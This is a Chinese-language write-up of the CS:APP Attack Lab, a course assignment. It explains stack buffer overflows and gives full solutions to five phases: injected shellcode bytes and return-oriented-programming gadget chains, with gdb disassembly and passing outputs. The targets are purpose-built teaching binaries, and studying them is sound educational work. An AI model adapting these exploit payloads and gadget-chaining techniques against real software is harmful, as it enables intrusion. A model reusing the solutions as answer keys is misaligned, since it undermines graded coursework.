owned this note
owned this note
Published
Linked with GitHub
# 2018q3 Attack Lab
contributed by <`datuiji`>
## 題目說明
- [Attack Lab 作業說明](http://csapp.cs.cmu.edu/3e/attacklab.pdf)
- 解壓縮文件後會看到以下檔案:
- ctarget: 執行 code-injection attack 的目標檔案
- rtarget: 執行 return-oriented-programming(ROP) attacks 的目標程式
- cookie.txt: 一個 8-digit hex code 作為攻擊用的特殊標誌
- farm.c:產生 "gadget farm" 並在 ROP 攻擊中使用
- hex2raw: 生成攻擊字串用
- Attack Lab 總共有五關,依據不同關卡需求,破解關卡即可完成任務。關卡任務會在以下一一說明。
## Buffer Overflow
- 緩衝區溢出的含義是為緩衝區提供了多於其存儲容量的數據,就像往杯子裡倒入了過量的水一樣。通常情況下,緩衝區溢出的數據只會破壞程序數據,造成意外終止。但是如果有人精心構造溢出數據的內容,那麼就有可能獲得系統的控制權!如果說用戶(也可能是黑客)提供了水——緩衝區溢出攻擊的數據,那麼系統提供了溢出的容器——緩衝區。
- 緩衝區在系統中的表現形式是多樣的,高級語言定義的變量、數組、結構體等在運行時可以說都是保存在緩衝區內的,因此所謂緩衝區可以更抽像地理解為一段可讀寫的內存區域,緩衝區攻擊的最終目的就是希望系統能執行這塊可讀寫內存中已經被蓄意設定好的惡意代碼。按照馮·諾依曼存儲程序原理,程序代碼是作為二進制數據存儲在內存的,同樣程序的數據也在內存中,因此直接從內存的二進制形式上是無法區分哪些是數據哪些是代碼的,這也為緩衝區溢出攻擊提供了可能。
![](https://i.imgur.com/uLxR6Xa.png)
- 圖1是進程地址空間分佈的簡單表示。代碼存儲了用戶程序的所有可執行代碼,在程序正常執行的情況下,程序計數器(PC指針)只會在代碼段和操作系統地址空間(內核態)內尋址。數據段內存儲了用戶程序的全局變量,文字池等。棧空間存儲了用戶程序的函數棧幀(包括參數、局部數據等),實現函數調用機制,它的數據增長方向是低地址方向。堆空間存儲了程序運行時動態申請的內存數據等,數據增長方向是高地址方向。除了代碼段和受操作系統保護的數據區域,其他的內存區域都可能作為緩衝區,因此緩衝區溢出的位置可能在數據段,也可能在堆、棧段。如果程序的代碼有軟件漏洞,惡意程序會“教唆”程序計數器從上述緩衝區內取指,執行惡意程序提供的數據代碼!本文分析並實現棧溢出攻擊方式。
- 上邊給出的代碼是無法進行溢出操作的,因為用戶沒有“插足”的機會。但是實際上很多程序都會接受用戶的外界輸入,尤其是當函數內的一個數組緩衝區接受用戶輸入的時候,一旦程序代碼未對輸入的長度進行合法性檢查的話,緩衝區溢出便有可能觸發!比如下邊的一個簡單的函數。
```clike=
void fun(unsigned char *data)
{
unsigned char buffer[BUF_LEN];
strcpy(( char *)buffer,( char *)data); // 溢出點
}
```
這個函數沒有做什麼有“意義”的事情(這裡主要是為了簡化問題),但是它是一個典型的棧溢出代碼。在使用不安全的strcpy庫函數時,系統會盲目地將data的全部數據拷貝到buffer指向的內存區域。buffer的長度是有限的,一旦data的數據長度超過BUF_LEN,便會產生緩衝區溢出。
![](https://i.imgur.com/4o21egB.png)
- 由於棧是低地址方向增長的,因此局部數組buffer的指針在緩衝區的下方。當把data的數據拷貝到buffer內時,超過緩衝區區域的高地址部分數據會“淹沒”原本的其他棧幀數據,根據淹沒數據的內容不同,可能會有產生以下情況:
1. 淹沒了其他的局部變量。如果被淹沒的局部變量是條件變量,那麼可能會改變函數原本的執行流程。這種方式可以用於破解簡單的軟件驗證。
1. 淹沒了ebp的值。修改了函數執行結束後要恢復的棧指針,將會導致棧幀失去平衡。
1. 淹沒了返回地址。這是棧溢出原理的核心所在,通過淹沒的方式修改函數的返回地址,使程序代碼執行“意外”的流程!
1. 淹沒參數變量。修改函數的參數變量也可能改變當前函數的執行結果和流程。
1. 淹沒上級函數的棧幀,情況與上述4點類似,只不過影響的是上級函數的執行。當然這裡的前提是保證函數能正常返回,即函數地址不能被隨意修改(這可能很麻煩!)。
- 參考資料:[緩衝區溢出攻擊](https://blog.csdn.net/beyond_2016/article/details/81316801)
## Phase 1
- 此關不必注入程式碼即可破解,此關必須將 function 的 return address 重寫,並導入到題目指定要求的 function。這一關任務是從 test 跳到 touch1。
- test
```clike=
void test()
{
int val;
val = getbuf();
printf("No exploit. Getbuf returned 0x%x\n", val);
}
```
- getbuf()
```clike=
unsigned getbuf()
{
char buf[BUFFER_SIZE];
Gets(buf);
return 1;
}
```
- 利用 gdb 查看 getbuf 組合語言
```
(gdb) disas getbuf
```
```clike=
Dump of assembler code for function getbuf:
0x00000000004017a8 <+0>: sub $0x28,%rsp
0x00000000004017ac <+4>: mov %rsp,%rdi
0x00000000004017af <+7>: callq 0x401a40 <Gets>
0x00000000004017b4 <+12>: mov $0x1,%eax
0x00000000004017b9 <+17>: add $0x28,%rsp
0x00000000004017bd <+21>: retq
End of assembler dump.
```
由 ==sub $0x28,%rsp== 可見 getbuf 時會在 stack 中分配 40 bytes 給 buf ,所以只要填超過 40 bytes 就發產生 buffer overflow ,另外在 40 bytes 後加入 touch1 的位址即可讓程式不返回到 test 而到 touch1。
- touch1
```clike=
void touch1()
{
vlevel = 1; /* Part of validation protocol */
printf("Touch1!: You called touch1()\n");
validate(1);
exit(0);
}
```
```
(gdb) disas touch1
```
```clike=
Dump of assembler code for function touch1:
0x00000000004017c0 <+0>: sub $0x8,%rsp
0x00000000004017c4 <+4>: movl $0x1,0x202d0e(%rip) # 0x6044dc <vlevel>
0x00000000004017ce <+14>: mov $0x4030c5,%edi
0x00000000004017d3 <+19>: callq 0x400cc0 <puts@plt>
0x00000000004017d8 <+24>: mov $0x1,%edi
0x00000000004017dd <+29>: callq 0x401c8d <validate>
0x00000000004017e2 <+34>: mov $0x0,%edi
0x00000000004017e7 <+39>: callq 0x400e40 <exit@plt>
End of assembler dump.
```
- ==0x00000000004017c0== 為 touch1 位址
- 由於我這台電腦是 little-endian 所以在填寫位址時要注意。
- phase1.txt
```clike=
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
c0 17 40 00 00 00 00 00
```
```
$ ./hex2raw -i phase1.txt | ./ctarget -q
```
```clike=
Cookie: 0x59b997fa
Type string:Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:ctarget:1:FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF C0 17 40 00 00 00 00 00
```
## Phase 2
- 第二關跟第一關差不多,只是多了參數傳遞。在 getbuf 返回後跳到 touch2 而不是 test 。只是 touch2 需要傳入參數並與 cookie 進行比較。
- touch2
```clike=
void touch2(unsigned val)
{
vlevel = 2; /* Part of validation protocol */
if (val == cookie) {
printf("Touch2!: You called touch2(0x%.8x)\n", val);
validate(2);
} else {
printf("Misfire: You called touch2(0x%.8x)\n", val);
fail(2);
}
exit(0);
}
```
```
(gdb) disas touch2
```
```clike=
Dump of assembler code for function touch2:
0x00000000004017ec <+0>: sub $0x8,%rsp
0x00000000004017f0 <+4>: mov %edi,%edx
0x00000000004017f2 <+6>: movl $0x2,0x202ce0(%rip) # 0x6044dc <vlevel>
0x00000000004017fc <+16>: cmp 0x202ce2(%rip),%edi # 0x6044e4 <cookie>
0x0000000000401802 <+22>: jne 0x401824 <touch2+56>
0x0000000000401804 <+24>: mov $0x4030e8,%esi
0x0000000000401809 <+29>: mov $0x1,%edi
0x000000000040180e <+34>: mov $0x0,%eax
0x0000000000401813 <+39>: callq 0x400df0 <__printf_chk@plt>
0x0000000000401818 <+44>: mov $0x2,%edi
0x000000000040181d <+49>: callq 0x401c8d <validate>
0x0000000000401822 <+54>: jmp 0x401842 <touch2+86>
0x0000000000401824 <+56>: mov $0x403110,%esi
0x0000000000401829 <+61>: mov $0x1,%edi
0x000000000040182e <+66>: mov $0x0,%eax
0x0000000000401833 <+71>: callq 0x400df0 <__printf_chk@plt>
0x0000000000401838 <+76>: mov $0x2,%edi
0x000000000040183d <+81>: callq 0x401d4f <fail>
0x0000000000401842 <+86>: mov $0x0,%edi
```
- 另外在 [Attack Lab 作業說明](http://csapp.cs.cmu.edu/3e/attacklab.pdf) 中有給一些建議。
:::info
- You will want to position a byte representation of the address of your injected code in such a way that ret instruction at the end of the code for getbuf will transfer control to it.
- Recall that the first argument to a function is passed in register %rdi.
- Your injected code should set the register to your cookie, and then use a ret instruction to transfer control to the first instruction in touch2.
- Do not attempt to use jmp or call instructions in your exploit code. The encodings of destination addresses for these instructions are difficult to formulate. Use ret instructions for all transfers of control, even when you are not returning from a call.
- See the discussion in Appendix B on how to use tools to generate the byte-level representations of instruction sequences.
:::
- 所以先將 cookie 放到 %rdi 中,在將 touch2 的位址 push 進 stack,最後 return 。
```css=
cookie:0x59b997fa
```
- phase2.s
```clike=
movq $0x59b997fa, %rdi
pushq $0x00000000004017ec
ret
```
```
$ gcc -c phase2.s
$ objdump -d phase2.o
```
```clike=
phase2.o: 檔案格式 elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
0: 48 c7 c7 fa 97 b9 59 mov $0x59b997fa,%rdi
7: 68 ec 17 40 00 pushq $0x4017ec
c: c3 retq
```
- 透過以上可以動作,可以得到以下指令序列
==48 c7 c7 fa 97 b9 59 68 ec 17 40 00 c3==
- 接下來透過 gdb 找到 %rsp 的位址
```clike=
(gdb) disas getbuf
Dump of assembler code for function getbuf:
0x00000000004017a8 <+0>: sub $0x28,%rsp
0x00000000004017ac <+4>: mov %rsp,%rdi
0x00000000004017af <+7>: callq 0x401a40 <Gets>
0x00000000004017b4 <+12>: mov $0x1,%eax
0x00000000004017b9 <+17>: add $0x28,%rsp
0x00000000004017bd <+21>: retq
End of assembler dump.
(gdb) b getbuf
Breakpoint 1 at 0x4017a8: file buf.c, line 12.
(gdb) run -q
Starting program: /home/datuiji/下載/target1/ctarget -q
Cookie: 0x59b997fa
Breakpoint 1, getbuf () at buf.c:12
12 buf.c: 沒有此一檔案或目錄.
(gdb) stepi
14 in buf.c
(gdb) p $rsp
$1 = (void *) 0x5561dc78
```
- 最後將以上序列以及填滿 40 bytes 加上 %rsp 位址組成 phase2.txt,即可完成此關。
- phase2.txt
```clike=
48 c7 c7 fa 97 b9 59 68 ec 17 <- 注入程式碼執行序列
40 00 c3 ff ff ff ff ff ff ff <- 後面 ff 為填滿 40 bytes
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
78 dc 61 55 00 00 00 00 <- 注入程式碼執行的起始位置(%rsp)
```
```
$ ./hex2raw -i phase2.txt | ./ctarget -q
```
```clike=
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target ctarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 78 DC 61 55 00 00 00 00
```
## Phase 3
- 第三關跟第二關差不多,在 getbuf 返回後 跳到 touch3 而不是 test 。只是 touch3 需要傳入字串並與 cookie 進行比較。
- hexmatch
```clike=
/* Compare string to hex represention of unsigned value */
int hexmatch(unsigned val, char *sval)
{
char cbuf[110];
/* Make position of check string unpredictable */
char *s = cbuf + random() % 100;
sprintf(s, "%.8x", val);
return strncmp(sval, s, 9) == 0;
}
```
- 這裡有一個問題值得探討,首先是 cookie 的存放位置,如果存放到 buf 裡,那接下来的 hexmatch可能覆蓋它的 stack,但是 test 的 stack 是安全的,我們把 touch3 的地址放到 test 的 stack 頂端就可以了
- touch3
```clike=
void touch3(char *sval)
{
if (hexmatch(cookie, sval)) {
printf("Touch3!: You called touch3(\"%s\")\n", sval);
validate(3);
} else {
printf("Misfire: You called touch3(\"%s\")\n", sval);
fail(3);
}
exit(0);
}
```
```
(gdb) disas touch3
```
```clike=
Dump of assembler code for function touch3:
0x00000000004018fa <+0>: push %rbx
0x00000000004018fb <+1>: mov %rdi,%rbx
0x00000000004018fe <+4>: movl $0x3,0x202bd4(%rip) # 0x6044dc <vlevel>
0x0000000000401908 <+14>: mov %rdi,%rsi
0x000000000040190b <+17>: mov 0x202bd3(%rip),%edi # 0x6044e4 <cookie>
0x0000000000401911 <+23>: callq 0x40184c <hexmatch>
0x0000000000401916 <+28>: test %eax,%eax
0x0000000000401918 <+30>: je 0x40193d <touch3+67>
0x000000000040191a <+32>: mov %rbx,%rdx
0x000000000040191d <+35>: mov $0x403138,%esi
0x0000000000401922 <+40>: mov $0x1,%edi
0x0000000000401927 <+45>: mov $0x0,%eax
0x000000000040192c <+50>: callq 0x400df0 <__printf_chk@plt>
0x0000000000401931 <+55>: mov $0x3,%edi
0x0000000000401936 <+60>: callq 0x401c8d <validate>
0x000000000040193b <+65>: jmp 0x40195e <touch3+100>
0x000000000040193d <+67>: mov %rbx,%rdx
0x0000000000401940 <+70>: mov $0x403160,%esi
0x0000000000401945 <+75>: mov $0x1,%edi
```
- 取得 touch3 地址為 ==0x00000000004018fa==
- [Attack Lab 作業說明](http://csapp.cs.cmu.edu/3e/attacklab.pdf) 中有給一些建議。
:::info
- You will need to include a string representation of your cookie in your exploit string. The string should consist of the eight hexadecimal digits (ordered from most to least significant) without a leading “0x.”
- Recall that a string is represented in C as a sequence of bytes followed by a byte with value 0. Type “man ascii” on any Linux machine to see the byte representations of the characters you need.
- Your injected code should set register %rdi to the address of this string.
- When functions hexmatch and strncmp are called, they push data onto the stack, overwriting portions of memory that held the buffer used by getbuf. As a result, you will need to be careful where you place the string representation of your cookie.
:::
- 先將 cookie 字串存放的地址放在 %rdi ,在把 touch3 的地址 push 進 stack 中,最後 return 。經上一關得知 %rsp 地址 0x5561dc78,返回地址為 %rsp+0x28,然後 cookie 字串地址應為 %rsp+0x30(48),所以 cookie 存放地址為 0x5561dca8 。
- phase3.s
```clike=
movq $0x5561dca8, %rdi
pushq $0x00000000004018fa
ret
```
```clike=
$ gcc -c phase3.s
$ objdump -d phase3.o
phase3.o: 檔案格式 elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
0: 48 c7 c7 a8 dc 61 55 mov $0x5561dca8,%rdi
7: 68 fa 18 40 00 pushq $0x4018fa
c: c3 retq
```
- 取得指令執行序列 ==48 c7 c7 a8 dc 61 55 68 fa 18 40 00 c3==
- the acsii code of cookie
```
35 39 62 39 39 37 66 61 00
```
- phase3.txt
```clike=
48 c7 c7 a8 dc 61 55 68 fa 18 <-指令執行序列
40 00 c3 ff ff ff ff ff ff ff <-ff 填滿 40 bytes
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
78 dc 61 55 00 00 00 00 35 39 <- %rsp 位置,cookie ascii
62 39 39 37 66 61 00
```
```clike=
$ ./hex2raw -i phase3.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target ctarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00
```
## Phase 4
- Phase 4 跟 Phase2 要作的東西一樣,因為堆疊隨機化的關係,我們無法使用固定的 %rsp 位址來進行跳轉,反之,我們需要利用程式內的固定指令序列來完成攻擊,所以 Phase 4 採用 ROP 攻擊。
- 這邊跟 Phase 2 採取動作類似,先將 cookie 移到 %rdi ,再將程式跳到 touch2 執行。不過在 rtarget 中 找不到 pop %rdi(5f)的指令序列,取而代之,這邊使用 pop %rax(58)取代
```clike=
popq %rax
movq %rax, %rdi
ret
```
- 查表後發現 popq %rax 指令為58
```clike=
00000000004019a7 <addval_219>:
4019a7: 8d 87 51 73 58 90 lea -0x6fa78caf(%rdi),%eax
4019ad: c3 retq
```
- ==0x4019ab== 為 gadget1
- movq %rax, %rdi 為 48 89 c7,ret c3
```clike=
00000000004019a0 <addval_273>:
4019a0: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
4019a6: c3 retq
```
- ==0x4019a2== 為 gadget2
- phase4.txt
```clike=
ff ff ff ff ff ff ff ff ff ff <-把 buffer 填滿 40 bytes
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
ab 19 40 00 00 00 00 00 <- gadget1 popq %rax
fa 97 b9 59 00 00 00 00 <- cookie
a2 19 40 00 00 00 00 00 <- gadget2 movq %rax, %rdi ret
ec 17 40 00 00 00 00 00 <- touch2 address
```
```
./hex2raw -i phase4.txt | ./rtarget -q
```
```clike=
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target rtarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:rtarget:2:FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF AB 19 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 A2 19 40 00 00 00 00 00 EC 17 40 00 00 00 00 00
```
## Phase 5
- Phase 5 跟 Phase 3 要求是一樣的,只是這邊要採用 ROP 攻擊。所以在想法上跟 Phase 3 差不多,需要先將 cookie 字串存放的地址放在 %rdi ,再把 touch3 的地址 push 進 stack 中,最後 return 。但由於 rtarget 的堆疊都是隨機的,所以這次不能採用 Phase 3 的方法得知 cookie 字串的位址。需要藉由 %rsp + offset 去推得 cookie 的起始位址。
- 此處整理一下 Phase 5 破關方法
- 1.先取得 %rsp 位址
- 2.將 %rsp 位址 + cookie 字串位址偏移量存到某個暫存器
- 3.然後把這個暫存器存到 %rdi
- 4.呼叫 touch3
- 5.將 cookie ascii 存入 stack
- 在 [Attack Lab 作業說明](http://csapp.cs.cmu.edu/3e/attacklab.pdf)中可以得到以下提示
:::info
To solve Phase 5, you can use gadgets in the region of the code in rtarget demarcated by functions start_farm and end_farm. In addition to the gadgets used in Phase 4, this expanded farm includes the encodings of different movl instructions, as shown in Figure 3C. The byte sequences in this part of the farm also contain 2-byte instructions that serve as functional nops, i.e., they do not change any register or memory values. These include instructions, shown in Figure 3D, such as andb %al,%al, that operate on the low-order bytes of some of the registers but do not change their values.
Some Advice:
- You’ll want to review the effect a movl instruction has on the upper 4 bytes of a register, as is described on page 183 of the text.
- The official solution requires eight gadgets (not all of which are unique).
:::
### 接下來依照上述五點逐步解決問題
- 1.取得 %rsp 位址:在 rtarget 中找到 mov %rsp,%rax:==48 89 e0==, ==gadget1:0x401a06==
```clike=
0000000000401a03 <addval_190>:
401a03: 8d 87 41 48 89 e0 lea -0x1f76b7bf(%rdi),%eax
401a09: c3 retq
```
- 第二步到第三步比較麻煩,因為在 rtarget 中無法找到直接的方法完成要求,所以需要動點技巧完成要求。
```clike=
mov %rax,%rdi
pop %rax
放進位移量
movl %eax, %edx
movl %edx, %ecx
movl %ecx, %esi
lea (%rdi,%rsi,1),%rax ->將 %rsp 位址 + cookie 字串位址偏移量存到 %rax
movq %rax, %rdi
```
- mov %rax,%rdi:==48 89 c7==, ==gadget2:0x4019a2==
```clike=
00000000004019a0 <addval_273>:
4019a0: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
4019a6: c3 retq
```
- pop %rax:==58==, ==gadget3:0x4019cc==
```clike=
00000000004019ca <getval_280>:
4019ca: b8 29 58 90 c3 mov $0xc3905829,%eax
4019cf: c3 retq
```
- movl %eax, %edx:==89 c2==, ==gadget4:0x4019dd==
```clike=
00000000004019db <getval_481>:
4019db: b8 5c 89 c2 90 mov $0x90c2895c,%eax
4019e0: c3 retq
```
- movl %edx, %ecx:==89 d1==, ==gadget5:0x401a70==
```clike=
0000000000401a6e <setval_167>:
401a6e: c7 07 89 d1 91 c3 movl $0xc391d189,(%rdi)
401a74: c3
```
- movl %ecx, %esi:==89 ce==, ==gadget6:0x0x401a13==
```clike=
0000000000401a11 <addval_436>:
401a11: 8d 87 89 ce 90 90 lea -0x6f6f3177(%rdi),%eax
401a17: c3
```
- lea (%rdi,%rsi,1),%rax:==48 8d 04 37==, ==gadget7:0x4019d6==
```clike=
00000000004019d6 <add_xy>:
4019d6: 48 8d 04 37 lea (%rdi,%rsi,1),%rax
4019da: c3 retq
```
- movq %rax, %rdi:==48 89 c7==, ==gadet8:0x4019a2==
```clike=
00000000004019a0 <addval_273>:
4019a0: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
4019a6: c3 retq
```
- phase5.txt
```clike=
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
06 1a 40 00 00 00 00 00 <-gadget1
a2 19 40 00 00 00 00 00 <-gadget2
cc 19 40 00 00 00 00 00 <-gadget3
48 00 00 00 00 00 00 00 <- cookie 字串跟 %rsp 差九條指令(72bytes)
dd 19 40 00 00 00 00 00 <-gadget4
70 1a 40 00 00 00 00 00 <-gadget5
13 1a 40 00 00 00 00 00 <-gadget6
d6 19 40 00 00 00 00 00 <-gadget7
a2 19 40 00 00 00 00 00 <-gadget8
fa 18 40 00 00 00 00 00 <-touch3 address
35 39 62 39 39 37 66 61 00 <- cookie ascii
```
- ```$ ./hex2raw -i phase5.txt | ./rtarget -q```
```clike=
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target rtarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:rtarget:3:FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 06 1A 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 CC 19 40 00 00 00 00 00 48 00 00 00 00 00 00 00 DD 19 40 00 00 00 00 00 70 1A 40 00 00
```